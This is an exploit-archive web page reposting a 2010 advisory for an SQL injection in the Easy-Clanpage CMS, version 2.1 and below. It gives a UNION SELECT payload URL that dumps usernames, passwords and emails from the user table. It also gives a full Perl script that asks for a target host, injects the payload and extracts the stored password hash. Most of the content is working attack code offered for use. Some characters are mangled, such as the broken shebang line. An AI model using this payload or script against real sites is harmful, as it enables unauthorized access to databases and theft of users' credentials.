Home / os / winme

Easy-Clanpage <= v2.1 SQL Injection Exploit

Posted on 30 March 2010

===========================================
Easy-Clanpage <= v2.1 SQL Injection Exploit
===========================================

/*----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.1 SQL Injection Exploit
+Author : Easy Laster
+Date   : 30.03.2010
+Script Easy-Clanpage <= v2.1
+Download : Update Version 2.01->2.1 http://www.easy-clanpage.de
/?section=downloads&action=viewdl&id=16
+Price : for free
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=
  
 
#SQL Injection
+Exploitable   : http://www.site.com/Easy-Clanpage/?section=gallery&action=kate&id=1
+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+ecp_user
+where+userid=1--
-----------------------------------------------------------------------------------------
 
+Exploit
*/
 
#!usrinperl
#
#
##################################################
# Modules                                        #
#------------------------------------------------#    
use strict;               # Better coding.       #
use warnings;             # Useful warnings.     #
use LWP::Simple;          # procedureal interface#
##################################################
print "
##################################################
#            4004-Security-Project               #
##################################################
#      Easy-Clanpage <= v2.1 SQL Injection       #
#                   Exploit                      #
#            Using Host+Path+Userid              #
#          www.demo.de /easyclanpage/ 1          #
#                   Easy Laster                  #
##################################################
a
";
my($host,$path,$userid,$request);
my($first,$block,$error,$dir);
$block = "
##################################################
";
$error = "Exploit failed";
  print "$block";
    print q(Target www.demo.de->);
    chomp($host =<STDIN>);
    if ($host eq""){
    die "$errora
"};
    print "$block";
          print q(Path /path/ ->);
          chomp($path =<STDIN>);
          if ($path eq""){
          die "$errora
";}
                 print "$block";
                 print q(userid->);
                  chomp($userid =<STDIN>);
                      if ($userid eq""){
                      die "$errora
";}
                      print "$block";
                         $dir = "?section=gallery&action=kate&id=";
                         print "<~> Exploiting...
";
                         $host = "http://".$host.$path;
                           print "<~> Connecting...
";
                           $request = get($host.$dir."1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,password),4,5,6,7+from+ecp_user+where+userid=".$userid."--");
                       $first = rindex($request,"#####");
                       if ($first != -1)
                       {
               print "<~> Exploiting...
";
               print "$block
";
         $request = substr($request, $first+5, 32);
         print "<~> Hash = $request

a";
       }
       else
     {
   print "<~> $error";
}


# Inj3ct0r.com [2010-03-30]

 

TOP

Malware :

Exploits :